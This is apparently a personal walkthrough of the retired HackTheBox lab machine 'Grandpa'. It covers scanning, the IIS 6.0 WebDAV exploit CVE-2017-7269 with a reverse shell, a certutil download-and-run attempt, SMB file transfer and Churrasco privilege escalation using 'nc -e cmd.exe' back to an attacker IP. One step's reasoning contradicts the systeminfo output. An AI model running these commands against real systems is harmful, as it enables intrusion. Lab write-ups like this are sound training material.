HackTheBox: Grandpa

Practing retired hackthebox machines. Had trouble with this one, knew what I had to do, but didn’t know how to do it. Need to practice more Windows machines.

Scanning:

  • Find running services:
crazyeights@es-base:~$ nmap -PS 10.10.10.14
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-02 11:09 EST
Nmap scan report for 10.10.10.14
Host is up (0.034s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http
  • Find more information about services (ie. versions, etc.)
crazyeights@es-base:~$ sudo nmap -sV 10.10.10.14
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0

Web:

Index Page:

Getting Server Version Info:
crazyeights@es-base:~$ nikto -h http://10.10.10.14
- Nikto v2.1.6
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
[SNIP]
+ WebDAV enabled (PROPFIND COPY PROPPATCH UNLOCK LOCK SEARCH MKCOL listed as allowed)
[SNIP]
  • Many different potential vulnerabilities were listed by nikto
  • We know the version of Microsoft-IIS is vulnerable, we must find an exploit
Searching for exploits:
  • Using searchsploit:
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFrom | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authenticat | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authenticat | windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Authenticat | windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authenticat | windows/remote/8806.pl

This is the only one that fits:

crazyeights@es-base:~$ searchsploit -x windows/remote/41738.py
  Exploit: Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow
  • The exploitdb script does not work here. There are many version of this exploit available.
The only working version of the exploit:
  • Found by googling CVE-2017-7269 reverse shell
https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell
  • Download the exploit
  • Start the listener:
nc -lvp 1234
Run the exploit:
  • Command is in the format: python [exploit] [VICTIM IP] [PORT] [ATTACKER IP] [LISTENER PORT]
crazyeights@es-base:~$ python iis_webdav_20177269.py 10.10.10.14 80 10.10.14.11 1234

User:

  • You get a shell with limited privileges:
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
  • Get OS info
C:\>systeminfo
systeminfo

Host Name:                 GRANPA
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
[SNIP]
  • Looking around:
C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\

04/12/2017  04:27 PM    <DIR>          ADFS
04/12/2017  04:04 PM                 0 AUTOEXEC.BAT
04/12/2017  04:04 PM                 0 CONFIG.SYS
04/12/2017  04:32 PM    <DIR>          Documents and Settings
04/12/2017  04:17 PM    <DIR>          FPSE_search
04/12/2017  04:17 PM    <DIR>          Inetpub
12/24/2017  07:18 PM    <DIR>          Program Files
12/24/2017  07:27 PM    <DIR>          WINDOWS
04/12/2017  04:05 PM    <DIR>          wmpub
               2 File(s)              0 bytes
               7 Dir(s)  18,088,382,464 bytes free
  • wmpub - directory user nt authority\network service can write to

  • Finding users:

C:\>cd "Documents and Settings"
cd "Documents and Settings"

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  04:32 PM    <DIR>          .
04/12/2017  04:32 PM    <DIR>          ..
04/12/2017  04:12 PM    <DIR>          Administrator
04/12/2017  04:03 PM    <DIR>          All Users
04/12/2017  04:32 PM    <DIR>          Harry
               0 File(s)              0 bytes
               5 Dir(s)  18,088,439,808 bytes free

C:\Documents and Settings>cd Harry
cd Harry
Access is denied.

C:\Documents and Settings>cd Administrator
cd Administrator
Access is denied.

C:\Documents and Settings>

There are two users:

  • Harry
  • Administrator
Looking for exploits:
  • We have the server version, and it old enough that there is definitely privilege escalation exploits for it
  • Using searchsploit:
Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation                                                                | windows/local/6705.txt
Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)                                                                  | windows/local/35936.py

This one must be correct - because OS version is not SP2

crazyeights@es-base:~$ searchsploit -x windows/local/6705.txt
  Exploit: Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation

Exploit steps:

  • download the exploit executable on to the remote machine
  • download netcat to get a reverse shell with elevated privileges
  • Start a listener and run the exploit with the command nc to be run with elevated privileges
  • Connect and download the flags

Found the executable for the exploit here:

https://github.com/Re4son/Churrasco/

Found the netcat executable for windows here:

https://eternallybored.org/misc/netcat/
  • Use the 32-bit version

Tried to use a webserver to transfer the exploit the target, didn’t work:

  • Put the exe on apache server:
crazyeights@es-base:~$ sudo cp Downloads/Churrasco-master/churrasco.exe /var/www/html/
[sudo] password for crazyeights: 
crazyeights@es-base:~$ sudo service apache2 start

  • Try to download exec from the server:
certutil.exe -UrlCache -split -f "http://10.10.14.11/churrasco.exe" bad.exe
Start the server:
crazyeights@es-base:~/tools/impacket/examples$ sudo python3 smbserver.py share /home/
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Download the files from the SMB server:
  • Download the churrasco exploit:
C:\wmpub>copy \\10.10.14.11\share\churrasco.exe bad.exe
copy \\10.10.14.11\share\churrasco.exe bad.exe
        1 file(s) copied.
  • Download 32-bit netcat executable:
C:\wmpub>copy \\10.10.14.11\share\nc.exe nc32.exe
copy \\10.10.14.11\share\nc.exe nc32.exe
        1 file(s) copied.
Start the listener on your machine:
nc -lvp 9999
Run the exploit:
  • I had to run it multiple times because it disconnected after a certain amount of time
C:\wmpub>.\bad.exe -d "C:\wmpub\nc32.exe -e cmd.exe 10.10.14.11 9999"             
.\bad.exe -d "C:\wmpub\nc32.exe -e cmd.exe 10.10.14.11 9999"
/churrasco/-->Current User: NETWORK SERVICE 
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 680 
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 684 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 688 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 696 
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
Get user flag:
C:\WINDOWS\TEMP>type "C:\Documents and Settings\Harry\Desktop\user.txt"
type "C:\Documents and Settings\Harry\Desktop\user.txt"
bdff5_i_dont_want_to_get_in_trouble

Root:

Get root flag:
C:\WINDOWS\TEMP>type "C:\Documents and Settings\Administrator\Desktop\root.txt"
type "C:\Documents and Settings\Administrator\Desktop\root.txt"
9359e_i_dont_want_to_get_in_trouble
C:\WINDOWS\TEMP>

FIN. 🥳